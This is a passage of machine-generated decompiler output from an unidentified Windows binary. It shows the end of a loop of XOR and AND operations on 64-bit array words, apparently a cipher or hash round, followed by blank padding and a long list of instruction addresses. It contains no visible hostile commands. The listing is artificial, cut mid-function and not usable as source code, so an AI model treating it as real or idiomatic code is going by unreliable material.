                                                                                                                                                                                                                                                                  					_t1545 = _v16;
                                                                                                                                                                                                                                                                  					_t2134 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1901 + _t1711 * 8 - 0x28) &  *(_t2134 + _t1545 * 8 - 0x40) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1901 + _t1711 * 8 - 0x24) &  *(_t2134 + _t1545 * 8 - 0x3c) ^ _v8;
                                                                                                                                                                                                                                                                  					_t1902 = _v16;
                                                                                                                                                                                                                                                                  					_t1546 = _a4;
                                                                                                                                                                                                                                                                  					_t1715 = _v16;
                                                                                                                                                                                                                                                                  					_t2135 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1546 + _t1902 * 8 - 0x90) &  *(_t2135 + _t1715 * 8 - 0x1b0) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1546 + _t1902 * 8 - 0x8c) &  *(_t2135 + _t1715 * 8 - 0x1ac) ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB18();
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB1E();
                                                                                                                                                                                                                                                                  					_t1718 = _v16;
                                                                                                                                                                                                                                                                  					_t2136 = _a4;
                                                                                                                                                                                                                                                                  					 *(_t2136 + 0x68 + _t1718 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					 *(_t2136 + 0x6c + _t1718 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					_v12 = _v28;
                                                                                                                                                                                                                                                                  					_v8 = _v24;
                                                                                                                                                                                                                                                                  					_t1719 = _v16;
                                                                                                                                                                                                                                                                  					_t1911 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1911 + _t1719 * 8 - 0x258);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1911 + _t1719 * 8 - 0x254);
                                                                                                                                                                                                                                                                  					_t1720 = _v16;
                                                                                                                                                                                                                                                                  					_t1912 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1912 + _t1720 * 8 - 0x18);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1912 + _t1720 * 8 - 0x14);
                                                                                                                                                                                                                                                                  					_t1721 = _v16;
                                                                                                                                                                                                                                                                  					_t1913 = _a4;
                                                                                                                                                                                                                                                                  					_t1556 = _v16;
                                                                                                                                                                                                                                                                  					_t2141 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1913 + _t1721 * 8 - 0x20) &  *(_t2141 + _t1556 * 8 - 0x38) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1913 + _t1721 * 8 - 0x1c) &  *(_t2141 + _t1556 * 8 - 0x34) ^ _v8;
                                                                                                                                                                                                                                                                  					_t1914 = _v16;
                                                                                                                                                                                                                                                                  					_t1557 = _a4;
                                                                                                                                                                                                                                                                  					_t1725 = _v16;
                                                                                                                                                                                                                                                                  					_t2142 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1557 + _t1914 * 8 - 0x88) &  *(_t2142 + _t1725 * 8 - 0x1a8) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1557 + _t1914 * 8 - 0x84) &  *(_t2142 + _t1725 * 8 - 0x1a4) ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB18();
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB1E();
                                                                                                                                                                                                                                                                  					_t1728 = _v16;
                                                                                                                                                                                                                                                                  					_t2143 = _a4;
                                                                                                                                                                                                                                                                  					 *(_t2143 + 0x70 + _t1728 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					 *(_t2143 + 0x74 + _t1728 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					_v12 = _v28;
                                                                                                                                                                                                                                                                  					_v8 = _v24;
                                                                                                                                                                                                                                                                  					_t1729 = _v16;
                                                                                                                                                                                                                                                                  					_t1923 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1923 + _t1729 * 8 - 0x250);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1923 + _t1729 * 8 - 0x24c);
                                                                                                                                                                                                                                                                  					_t1730 = _v16;
                                                                                                                                                                                                                                                                  					_t1924 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1924 + _t1730 * 8 - 0x10);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1924 + _t1730 * 8 - 0xc);
                                                                                                                                                                                                                                                                  					_t1731 = _v16;
                                                                                                                                                                                                                                                                  					_t1925 = _a4;
                                                                                                                                                                                                                                                                  					_t1567 = _v16;
                                                                                                                                                                                                                                                                  					_t2148 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1925 + _t1731 * 8 - 0x18) &  *(_t2148 + _t1567 * 8 - 0x30) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1925 + _t1731 * 8 - 0x14) &  *(_t2148 + _t1567 * 8 - 0x2c) ^ _v8;
                                                                                                                                                                                                                                                                  					_t1926 = _v16;
                                                                                                                                                                                                                                                                  					_t1568 = _a4;
                                                                                                                                                                                                                                                                  					_t1735 = _v16;
                                                                                                                                                                                                                                                                  					_t2149 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1568 + _t1926 * 8 - 0x80) &  *(_t2149 + _t1735 * 8 - 0x1a0) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1568 + _t1926 * 8 - 0x7c) &  *(_t2149 + _t1735 * 8 - 0x19c) ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB18();
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB1E();
                                                                                                                                                                                                                                                                  					_t1738 = _v16;
                                                                                                                                                                                                                                                                  					_t2150 = _a4;
                                                                                                                                                                                                                                                                  					 *(_t2150 + 0x78 + _t1738 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					 *(_t2150 + 0x7c + _t1738 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB1E();
                                                                                                                                                                                                                                                                  					L0040EB18();
                                                                                                                                                                                                                                                                  					_v28 = _v28 ^ _v28 ^ _v28 &  *0x410128;
                                                                                                                                                                                                                                                                  					_v24 = _v24 ^ _v24 ^ _v24 &  *0x41012c;
                                                                                                                                                                                                                                                                  					_v16 = _v16 + 0x10;
                                                                                                                                                                                                                                                                  					_v32 = _v32 + 0x10;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t1396;
                                                                                                                                                                                                                                                                  			}












































































































































































































































                                                                                                                                                                                                                                                                  0x00406338
                                                                                                                                                                                                                                                                  0x0040633d
                                                                                                                                                                                                                                                                  0x00406340
                                                                                                                                                                                                                                                                  0x00406346
                                                                                                                                                                                                                                                                  0x00406349
                                                                                                                                                                                                                                                                  0x00406350
                                                                                                                                                                                                                                                                  0x00406362
                                                                                                                                                                                                                                                                  0x00406365
                                                                                                                                                                                                                                                                  0x0040636b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00406374
                                                                                                                                                                                                                                                                  0x0040637a
                                                                                                                                                                                                                                                                  0x0040637d
                                                                                                                                                                                                                                                                  0x00406380
                                                                                                                                                                                                                                                                  0x00406397
                                                                                                                                                                                                                                                                  0x0040639a
                                                                                                                                                                                                                                                                  0x0040639d
                                                                                                                                                                                                                                                                  0x004063a0
                                                                                                                                                                                                                                                                  0x004063b7
                                                                                                                                                                                                                                                                  0x004063ba
                                                                                                                                                                                                                                                                  0x004063bd
                                                                                                                                                                                                                                                                  0x004063c0
                                                                                                                                                                                                                                                                  0x004063c3
                                                                                                                                                                                                                                                                  0x004063c6
                                                                                                                                                                                                                                                                  0x004063eb
                                                                                                                                                                                                                                                                  0x004063ee
                                                                                                                                                                                                                                                                  0x004063f1
                                                                                                                                                                                                                                                                  0x004063f4
                                                                                                                                                                                                                                                                  0x004063f7
                                                                                                                                                                                                                                                                  0x004063fa
                                                                                                                                                                                                                                                                  0x0040641f
                                                                                                                                                                                                                                                                  0x00406422
                                                                                                                                                                                                                                                                  0x0040642d
                                                                                                                                                                                                                                                                  0x00406438
                                                                                                                                                                                                                                                                  0x0040643b
                                                                                                                                                                                                                                                                  0x00406446
                                                                                                                                                                                                                                                                  0x00406451
                                                                                                                                                                                                                                                                  0x00406454
                                                                                                                                                                                                                                                                  0x00406457
                                                                                                                                                                                                                                                                  0x0040645a
                                                                                                                                                                                                                                                                  0x00406461
                                                                                                                                                                                                                                                                  0x00406467
                                                                                                                                                                                                                                                                  0x0040646a
                                                                                                                                                                                                                                                                  0x0040646d
                                                                                                                                                                                                                                                                  0x00406484
                                                                                                                                                                                                                                                                  0x00406487
                                                                                                                                                                                                                                                                  0x0040648a
                                                                                                                                                                                                                                                                  0x0040648d
                                                                                                                                                                                                                                                                  0x0040649e
                                                                                                                                                                                                                                                                  0x004064a1
                                                                                                                                                                                                                                                                  0x004064a4
                                                                                                                                                                                                                                                                  0x004064a7
                                                                                                                                                                                                                                                                  0x004064aa
                                                                                                                                                                                                                                                                  0x004064ad
                                                                                                                                                                                                                                                                  0x004064d2
                                                                                                                                                                                                                                                                  0x004064d5
                                                                                                                                                                                                                                                                  0x004064d8
                                                                                                                                                                                                                                                                  0x004064db
                                                                                                                                                                                                                                                                  0x004064de
                                                                                                                                                                                                                                                                  0x004064e1
                                                                                                                                                                                                                                                                  0x00406506
                                                                                                                                                                                                                                                                  0x00406509
                                                                                                                                                                                                                                                                  0x00406514
                                                                                                                                                                                                                                                                  0x0040651f
                                                                                                                                                                                                                                                                  0x00406522
                                                                                                                                                                                                                                                                  0x0040652d
                                                                                                                                                                                                                                                                  0x00406538
                                                                                                                                                                                                                                                                  0x0040653b
                                                                                                                                                                                                                                                                  0x0040653e
                                                                                                                                                                                                                                                                  0x00406542
                                                                                                                                                                                                                                                                  0x00406549
                                                                                                                                                                                                                                                                  0x0040654f
                                                                                                                                                                                                                                                                  0x00406552
                                                                                                                                                                                                                                                                  0x00406555
                                                                                                                                                                                                                                                                  0x0040656c
                                                                                                                                                                                                                                                                  0x0040656f
                                                                                                                                                                                                                                                                  0x00406572
                                                                                                                                                                                                                                                                  0x00406575
                                                                                                                                                                                                                                                                  0x00406586
                                                                                                                                                                                                                                                                  0x00406589
                                                                                                                                                                                                                                                                  0x0040658c
                                                                                                                                                                                                                                                                  0x0040658f
                                                                                                                                                                                                                                                                  0x00406592
                                                                                                                                                                                                                                                                  0x00406595
                                                                                                                                                                                                                                                                  0x004065b4
                                                                                                                                                                                                                                                                  0x004065b7
                                                                                                                                                                                                                                                                  0x004065ba
                                                                                                                                                                                                                                                                  0x004065bd
                                                                                                                                                                                                                                                                  0x004065c0
                                                                                                                                                                                                                                                                  0x004065c3
                                                                                                                                                                                                                                                                  0x004065e8
                                                                                                                                                                                                                                                                  0x004065eb
                                                                                                                                                                                                                                                                  0x004065f6
                                                                                                                                                                                                                                                                  0x00406601
                                                                                                                                                                                                                                                                  0x00406604
                                                                                                                                                                                                                                                                  0x0040660f
                                                                                                                                                                                                                                                                  0x0040661a
                                                                                                                                                                                                                                                                  0x0040661d
                                                                                                                                                                                                                                                                  0x00406620
                                                                                                                                                                                                                                                                  0x00406624
                                                                                                                                                                                                                                                                  0x0040662b
                                                                                                                                                                                                                                                                  0x00406631
                                                                                                                                                                                                                                                                  0x00406634
                                                                                                                                                                                                                                                                  0x00406637
                                                                                                                                                                                                                                                                  0x0040664e
                                                                                                                                                                                                                                                                  0x00406651
                                                                                                                                                                                                                                                                  0x00406654
                                                                                                                                                                                                                                                                  0x00406657
                                                                                                                                                                                                                                                                  0x00406668
                                                                                                                                                                                                                                                                  0x0040666b
                                                                                                                                                                                                                                                                  0x0040666e
                                                                                                                                                                                                                                                                  0x00406671
                                                                                                                                                                                                                                                                  0x00406674
                                                                                                                                                                                                                                                                  0x00406677
                                                                                                                                                                                                                                                                  0x00406696
                                                                                                                                                                                                                                                                  0x00406699
                                                                                                                                                                                                                                                                  0x0040669c
                                                                                                                                                                                                                                                                  0x0040669f
                                                                                                                                                                                                                                                                  0x004066a2
                                                                                                                                                                                                                                                                  0x004066a5
                                                                                                                                                                                                                                                                  0x004066ca
                                                                                                                                                                                                                                                                  0x004066cd
                                                                                                                                                                                                                                                                  0x004066d8
                                                                                                                                                                                                                                                                  0x004066e3
                                                                                                                                                                                                                                                                  0x004066e6
                                                                                                                                                                                                                                                                  0x004066f1
                                                                                                                                                                                                                                                                  0x004066fc
                                                                                                                                                                                                                                                                  0x004066ff
                                                                                                                                                                                                                                                                  0x00406702
                                                                                                                                                                                                                                                                  0x00406706
                                                                                                                                                                                                                                                                  0x0040670d
                                                                                                                                                                                                                                                                  0x00406713
                                                                                                                                                                                                                                                                  0x00406716
                                                                                                                                                                                                                                                                  0x00406719
                                                                                                                                                                                                                                                                  0x00406730
                                                                                                                                                                                                                                                                  0x00406733
                                                                                                                                                                                                                                                                  0x00406736
                                                                                                                                                                                                                                                                  0x00406739
                                                                                                                                                                                                                                                                  0x0040674a
                                                                                                                                                                                                                                                                  0x0040674d
                                                                                                                                                                                                                                                                  0x00406750
                                                                                                                                                                                                                                                                  0x00406753
                                                                                                                                                                                                                                                                  0x00406756
                                                                                                                                                                                                                                                                  0x00406759
                                                                                                                                                                                                                                                                  0x00406778
                                                                                                                                                                                                                                                                  0x0040677b
                                                                                                                                                                                                                                                                  0x0040677e
                                                                                                                                                                                                                                                                  0x00406781
                                                                                                                                                                                                                                                                  0x00406784
                                                                                                                                                                                                                                                                  0x00406787
                                                                                                                                                                                                                                                                  0x004067ac
                                                                                                                                                                                                                                                                  0x004067af
                                                                                                                                                                                                                                                                  0x004067ba
                                                                                                                                                                                                                                                                  0x004067c5
                                                                                                                                                                                                                                                                  0x004067c8
                                                                                                                                                                                                                                                                  0x004067d3
                                                                                                                                                                                                                                                                  0x004067de
                                                                                                                                                                                                                                                                  0x004067e1
                                                                                                                                                                                                                                                                  0x004067e4
                                                                                                                                                                                                                                                                  0x004067e8
                                                                                                                                                                                                                                                                  0x004067ef
                                                                                                                                                                                                                                                                  0x004067f5
                                                                                                                                                                                                                                                                  0x004067f8
                                                                                                                                                                                                                                                                  0x004067fb
                                                                                                                                                                                                                                                                  0x00406812
                                                                                                                                                                                                                                                                  0x00406815
                                                                                                                                                                                                                                                                  0x00406818
                                                                                                                                                                                                                                                                  0x0040681b
                                                                                                                                                                                                                                                                  0x0040682c
                                                                                                                                                                                                                                                                  0x0040682f
                                                                                                                                                                                                                                                                  0x00406832
                                                                                                                                                                                                                                                                  0x00406835
                                                                                                                                                                                                                                                                  0x00406838
                                                                                                                                                                                                                                                                  0x0040683b
                                                                                                                                                                                                                                                                  0x00406854
                                                                                                                                                                                                                                                                  0x00406857
                                                                                                                                                                                                                                                                  0x0040685a
                                                                                                                                                                                                                                                                  0x0040685d
                                                                                                                                                                                                                                                                  0x00406860
                                                                                                                                                                                                                                                                  0x00406863
                                                                                                                                                                                                                                                                  0x00406888
                                                                                                                                                                                                                                                                  0x0040688b
                                                                                                                                                                                                                                                                  0x00406896
                                                                                                                                                                                                                                                                  0x004068a1
                                                                                                                                                                                                                                                                  0x004068a4
                                                                                                                                                                                                                                                                  0x004068af
                                                                                                                                                                                                                                                                  0x004068ba
                                                                                                                                                                                                                                                                  0x004068bd
                                                                                                                                                                                                                                                                  0x004068c0
                                                                                                                                                                                                                                                                  0x004068c4
                                                                                                                                                                                                                                                                  0x004068cb
                                                                                                                                                                                                                                                                  0x004068d1
                                                                                                                                                                                                                                                                  0x004068d4
                                                                                                                                                                                                                                                                  0x004068d7
                                                                                                                                                                                                                                                                  0x004068ee
                                                                                                                                                                                                                                                                  0x004068f1
                                                                                                                                                                                                                                                                  0x004068f4
                                                                                                                                                                                                                                                                  0x004068f7
                                                                                                                                                                                                                                                                  0x00406908
                                                                                                                                                                                                                                                                  0x0040690b
                                                                                                                                                                                                                                                                  0x0040690e
                                                                                                                                                                                                                                                                  0x00406911
                                                                                                                                                                                                                                                                  0x00406914
                                                                                                                                                                                                                                                                  0x00406917
                                                                                                                                                                                                                                                                  0x00406930
                                                                                                                                                                                                                                                                  0x00406933
                                                                                                                                                                                                                                                                  0x00406936
                                                                                                                                                                                                                                                                  0x00406939
                                                                                                                                                                                                                                                                  0x0040693c
                                                                                                                                                                                                                                                                  0x0040693f
                                                                                                                                                                                                                                                                  0x00406964
                                                                                                                                                                                                                                                                  0x00406967
                                                                                                                                                                                                                                                                  0x00406972
                                                                                                                                                                                                                                                                  0x0040697d
                                                                                                                                                                                                                                                                  0x00406980
                                                                                                                                                                                                                                                                  0x0040698b
                                                                                                                                                                                                                                                                  0x00406996
                                                                                                                                                                                                                                                                  0x00406999
                                                                                                                                                                                                                                                                  0x0040699c
                                                                                                                                                                                                                                                                  0x004069a0
                                                                                                                                                                                                                                                                  0x004069a7
                                                                                                                                                                                                                                                                  0x004069ad
                                                                                                                                                                                                                                                                  0x004069b0
                                                                                                                                                                                                                                                                  0x004069b3
                                                                                                                                                                                                                                                                  0x004069ca
                                                                                                                                                                                                                                                                  0x004069cd
                                                                                                                                                                                                                                                                  0x004069d0
                                                                                                                                                                                                                                                                  0x004069d3
                                                                                                                                                                                                                                                                  0x004069e4
                                                                                                                                                                                                                                                                  0x004069e7
                                                                                                                                                                                                                                                                  0x004069ea
                                                                                                                                                                                                                                                                  0x004069ed
                                                                                                                                                                                                                                                                  0x004069f0
                                                                                                                                                                                                                                                                  0x004069f3
                                                                                                                                                                                                                                                                  0x00406a0c
                                                                                                                                                                                                                                                                  0x00406a0f
                                                                                                                                                                                                                                                                  0x00406a12
                                                                                                                                                                                                                                                                  0x00406a15
                                                                                                                                                                                                                                                                  0x00406a18
                                                                                                                                                                                                                                                                  0x00406a1b
                                                                                                                                                                                                                                                                  0x00406a40
                                                                                                                                                                                                                                                                  0x00406a43
                                                                                                                                                                                                                                                                  0x00406a4e
                                                                                                                                                                                                                                                                  0x00406a59
                                                                                                                                                                                                                                                                  0x00406a5c
                                                                                                                                                                                                                                                                  0x00406a67
                                                                                                                                                                                                                                                                  0x00406a72
                                                                                                                                                                                                                                                                  0x00406a75
                                                                                                                                                                                                                                                                  0x00406a78
                                                                                                                                                                                                                                                                  0x00406a7c
                                                                                                                                                                                                                                                                  0x00406a83
                                                                                                                                                                                                                                                                  0x00406a89
                                                                                                                                                                                                                                                                  0x00406a8c
                                                                                                                                                                                                                                                                  0x00406a8f
                                                                                                                                                                                                                                                                  0x00406aa6
                                                                                                                                                                                                                                                                  0x00406aa9
                                                                                                                                                                                                                                                                  0x00406aac
                                                                                                                                                                                                                                                                  0x00406aaf
                                                                                                                                                                                                                                                                  0x00406ac0
                                                                                                                                                                                                                                                                  0x00406ac3
                                                                                                                                                                                                                                                                  0x00406ac6
                                                                                                                                                                                                                                                                  0x00406ac9
                                                                                                                                                                                                                                                                  0x00406acc
                                                                                                                                                                                                                                                                  0x00406acf
                                                                                                                                                                                                                                                                  0x00406ae8
                                                                                                                                                                                                                                                                  0x00406aeb
                                                                                                                                                                                                                                                                  0x00406aee
                                                                                                                                                                                                                                                                  0x00406af1
                                                                                                                                                                                                                                                                  0x00406af4
                                                                                                                                                                                                                                                                  0x00406af7
                                                                                                                                                                                                                                                                  0x00406b1c
                                                                                                                                                                                                                                                                  0x00406b1f
                                                                                                                                                                                                                                                                  0x00406b2a
                                                                                                                                                                                                                                                                  0x00406b35
                                                                                                                                                                                                                                                                  0x00406b38
                                                                                                                                                                                                                                                                  0x00406b43
                                                                                                                                                                                                                                                                  0x00406b4e
                                                                                                                                                                                                                                                                  0x00406b51
                                                                                                                                                                                                                                                                  0x00406b54
                                                                                                                                                                                                                                                                  0x00406b58
                                                                                                                                                                                                                                                                  0x00406b5f
                                                                                                                                                                                                                                                                  0x00406b65
                                                                                                                                                                                                                                                                  0x00406b68
                                                                                                                                                                                                                                                                  0x00406b6b
                                                                                                                                                                                                                                                                  0x00406b82
                                                                                                                                                                                                                                                                  0x00406b85
                                                                                                                                                                                                                                                                  0x00406b88
                                                                                                                                                                                                                                                                  0x00406b8b
                                                                                                                                                                                                                                                                  0x00406b9c
                                                                                                                                                                                                                                                                  0x00406b9f
                                                                                                                                                                                                                                                                  0x00406ba2
                                                                                                                                                                                                                                                                  0x00406ba5
                                                                                                                                                                                                                                                                  0x00406ba8
                                                                                                                                                                                                                                                                  0x00406bab
                                                                                                                                                                                                                                                                  0x00406bc4
                                                                                                                                                                                                                                                                  0x00406bc7
                                                                                                                                                                                                                                                                  0x00406bca
                                                                                                                                                                                                                                                                  0x00406bcd
                                                                                                                                                                                                                                                                  0x00406bd0
                                                                                                                                                                                                                                                                  0x00406bd3
                                                                                                                                                                                                                                                                  0x00406bf8
                                                                                                                                                                                                                                                                  0x00406bfb
                                                                                                                                                                                                                                                                  0x00406c06
                                                                                                                                                                                                                                                                  0x00406c11
                                                                                                                                                                                                                                                                  0x00406c14
                                                                                                                                                                                                                                                                  0x00406c1f
                                                                                                                                                                                                                                                                  0x00406c2a
                                                                                                                                                                                                                                                                  0x00406c2d
                                                                                                                                                                                                                                                                  0x00406c30
                                                                                                                                                                                                                                                                  0x00406c34
                                                                                                                                                                                                                                                                  0x00406c3b
                                                                                                                                                                                                                                                                  0x00406c41
                                                                                                                                                                                                                                                                  0x00406c44
                                                                                                                                                                                                                                                                  0x00406c47
                                                                                                                                                                                                                                                                  0x00406c5e
                                                                                                                                                                                                                                                                  0x00406c61
                                                                                                                                                                                                                                                                  0x00406c64
                                                                                                                                                                                                                                                                  0x00406c67
                                                                                                                                                                                                                                                                  0x00406c78
                                                                                                                                                                                                                                                                  0x00406c7b
                                                                                                                                                                                                                                                                  0x00406c7e
                                                                                                                                                                                                                                                                  0x00406c81
                                                                                                                                                                                                                                                                  0x00406c84
                                                                                                                                                                                                                                                                  0x00406c87
                                                                                                                                                                                                                                                                  0x00406ca0
                                                                                                                                                                                                                                                                  0x00406ca3
                                                                                                                                                                                                                                                                  0x00406ca6
                                                                                                                                                                                                                                                                  0x00406ca9
                                                                                                                                                                                                                                                                  0x00406cac
                                                                                                                                                                                                                                                                  0x00406caf
                                                                                                                                                                                                                                                                  0x00406cd4
                                                                                                                                                                                                                                                                  0x00406cd7
                                                                                                                                                                                                                                                                  0x00406ce2
                                                                                                                                                                                                                                                                  0x00406ced
                                                                                                                                                                                                                                                                  0x00406cf0
                                                                                                                                                                                                                                                                  0x00406cfb
                                                                                                                                                                                                                                                                  0x00406d06
                                                                                                                                                                                                                                                                  0x00406d09
                                                                                                                                                                                                                                                                  0x00406d0c
                                                                                                                                                                                                                                                                  0x00406d10
                                                                                                                                                                                                                                                                  0x00406d17
                                                                                                                                                                                                                                                                  0x00406d1d
                                                                                                                                                                                                                                                                  0x00406d20
                                                                                                                                                                                                                                                                  0x00406d23
                                                                                                                                                                                                                                                                  0x00406d3a
                                                                                                                                                                                                                                                                  0x00406d3d
                                                                                                                                                                                                                                                                  0x00406d40
                                                                                                                                                                                                                                                                  0x00406d43
                                                                                                                                                                                                                                                                  0x00406d54
                                                                                                                                                                                                                                                                  0x00406d57
                                                                                                                                                                                                                                                                  0x00406d5a
                                                                                                                                                                                                                                                                  0x00406d5d
                                                                                                                                                                                                                                                                  0x00406d60
                                                                                                                                                                                                                                                                  0x00406d63
                                                                                                                                                                                                                                                                  0x00406d7c
                                                                                                                                                                                                                                                                  0x00406d7f
                                                                                                                                                                                                                                                                  0x00406d82
                                                                                                                                                                                                                                                                  0x00406d85
                                                                                                                                                                                                                                                                  0x00406d88
                                                                                                                                                                                                                                                                  0x00406d8b
                                                                                                                                                                                                                                                                  0x00406db0
                                                                                                                                                                                                                                                                  0x00406db3
                                                                                                                                                                                                                                                                  0x00406dbe
                                                                                                                                                                                                                                                                  0x00406dc9
                                                                                                                                                                                                                                                                  0x00406dcc
                                                                                                                                                                                                                                                                  0x00406dd7
                                                                                                                                                                                                                                                                  0x00406de2
                                                                                                                                                                                                                                                                  0x00406de5
                                                                                                                                                                                                                                                                  0x00406de8
                                                                                                                                                                                                                                                                  0x00406dec
                                                                                                                                                                                                                                                                  0x00406df3
                                                                                                                                                                                                                                                                  0x00406df9
                                                                                                                                                                                                                                                                  0x00406dfc
                                                                                                                                                                                                                                                                  0x00406dff
                                                                                                                                                                                                                                                                  0x00406e16
                                                                                                                                                                                                                                                                  0x00406e19
                                                                                                                                                                                                                                                                  0x00406e1c
                                                                                                                                                                                                                                                                  0x00406e1f
                                                                                                                                                                                                                                                                  0x00406e30
                                                                                                                                                                                                                                                                  0x00406e33
                                                                                                                                                                                                                                                                  0x00406e36
                                                                                                                                                                                                                                                                  0x00406e39
                                                                                                                                                                                                                                                                  0x00406e3c
                                                                                                                                                                                                                                                                  0x00406e3f
                                                                                                                                                                                                                                                                  0x00406e58
                                                                                                                                                                                                                                                                  0x00406e5b
                                                                                                                                                                                                                                                                  0x00406e5e
                                                                                                                                                                                                                                                                  0x00406e61
                                                                                                                                                                                                                                                                  0x00406e64
                                                                                                                                                                                                                                                                  0x00406e67
                                                                                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                                                                                  0x00406e8f
                                                                                                                                                                                                                                                                  0x00406e9a
                                                                                                                                                                                                                                                                  0x00406ea5
                                                                                                                                                                                                                                                                  0x00406ea8
                                                                                                                                                                                                                                                                  0x00406eb3
                                                                                                                                                                                                                                                                  0x00406ebe
                                                                                                                                                                                                                                                                  0x00406ec1
                                                                                                                                                                                                                                                                  0x00406ec4
                                                                                                                                                                                                                                                                  0x00406ec8
                                                                                                                                                                                                                                                                  0x00406ecf
                                                                                                                                                                                                                                                                  0x00406ed5
                                                                                                                                                                                                                                                                  0x00406ed8
                                                                                                                                                                                                                                                                  0x00406edb
                                                                                                                                                                                                                                                                  0x00406ef2
                                                                                                                                                                                                                                                                  0x00406ef5
                                                                                                                                                                                                                                                                  0x00406ef8
                                                                                                                                                                                                                                                                  0x00406efb
                                                                                                                                                                                                                                                                  0x00406f0c
                                                                                                                                                                                                                                                                  0x00406f0f
                                                                                                                                                                                                                                                                  0x00406f12
                                                                                                                                                                                                                                                                  0x00406f15
                                                                                                                                                                                                                                                                  0x00406f18
                                                                                                                                                                                                                                                                  0x00406f1b
                                                                                                                                                                                                                                                                  0x00406f34
                                                                                                                                                                                                                                                                  0x00406f37
                                                                                                                                                                                                                                                                  0x00406f3a
                                                                                                                                                                                                                                                                  0x00406f3d
                                                                                                                                                                                                                                                                  0x00406f40
                                                                                                                                                                                                                                                                  0x00406f43
                                                                                                                                                                                                                                                                  0x00406f68
                                                                                                                                                                                                                                                                  0x00406f6b
                                                                                                                                                                                                                                                                  0x00406f76
                                                                                                                                                                                                                                                                  0x00406f81
                                                                                                                                                                                                                                                                  0x00406f84
                                                                                                                                                                                                                                                                  0x00406f8f
                                                                                                                                                                                                                                                                  0x00406f9a
                                                                                                                                                                                                                                                                  0x00406f9d
                                                                                                                                                                                                                                                                  0x00406fa0
                                                                                                                                                                                                                                                                  0x00406fa4
                                                                                                                                                                                                                                                                  0x00406fab
                                                                                                                                                                                                                                                                  0x00406fb1
                                                                                                                                                                                                                                                                  0x00406fb4
                                                                                                                                                                                                                                                                  0x00406fb7
                                                                                                                                                                                                                                                                  0x00406fce
                                                                                                                                                                                                                                                                  0x00406fd1
                                                                                                                                                                                                                                                                  0x00406fd4
                                                                                                                                                                                                                                                                  0x00406fd7
                                                                                                                                                                                                                                                                  0x00406fe8
                                                                                                                                                                                                                                                                  0x00406feb
                                                                                                                                                                                                                                                                  0x00406fee
                                                                                                                                                                                                                                                                  0x00406ff1
                                                                                                                                                                                                                                                                  0x00406ff4
                                                                                                                                                                                                                                                                  0x00406ff7
                                                                                                                                                                                                                                                                  0x00407010
                                                                                                                                                                                                                                                                  0x00407013
                                                                                                                                                                                                                                                                  0x00407016
                                                                                                                                                                                                                                                                  0x00407019
                                                                                                                                                                                                                                                                  0x0040701c
                                                                                                                                                                                                                                                                  0x0040701f
                                                                                                                                                                                                                                                                  0x00407044
                                                                                                                                                                                                                                                                  0x00407047
                                                                                                                                                                                                                                                                  0x00407052
                                                                                                                                                                                                                                                                  0x0040705d
                                                                                                                                                                                                                                                                  0x00407060
                                                                                                                                                                                                                                                                  0x0040706b
                                                                                                                                                                                                                                                                  0x00407076
                                                                                                                                                                                                                                                                  0x00407079
                                                                                                                                                                                                                                                                  0x0040707c
                                                                                                                                                                                                                                                                  0x00407080
                                                                                                                                                                                                                                                                  0x00407087
                                                                                                                                                                                                                                                                  0x0040708d
                                                                                                                                                                                                                                                                  0x00407090
                                                                                                                                                                                                                                                                  0x00407093
                                                                                                                                                                                                                                                                  0x004070aa
                                                                                                                                                                                                                                                                  0x004070ad
                                                                                                                                                                                                                                                                  0x004070b0
                                                                                                                                                                                                                                                                  0x004070b3
                                                                                                                                                                                                                                                                  0x004070c4
                                                                                                                                                                                                                                                                  0x004070c7
                                                                                                                                                                                                                                                                  0x004070ca
                                                                                                                                                                                                                                                                  0x004070cd
                                                                                                                                                                                                                                                                  0x004070d0
                                                                                                                                                                                                                                                                  0x004070d3
                                                                                                                                                                                                                                                                  0x004070ec
                                                                                                                                                                                                                                                                  0x004070ef
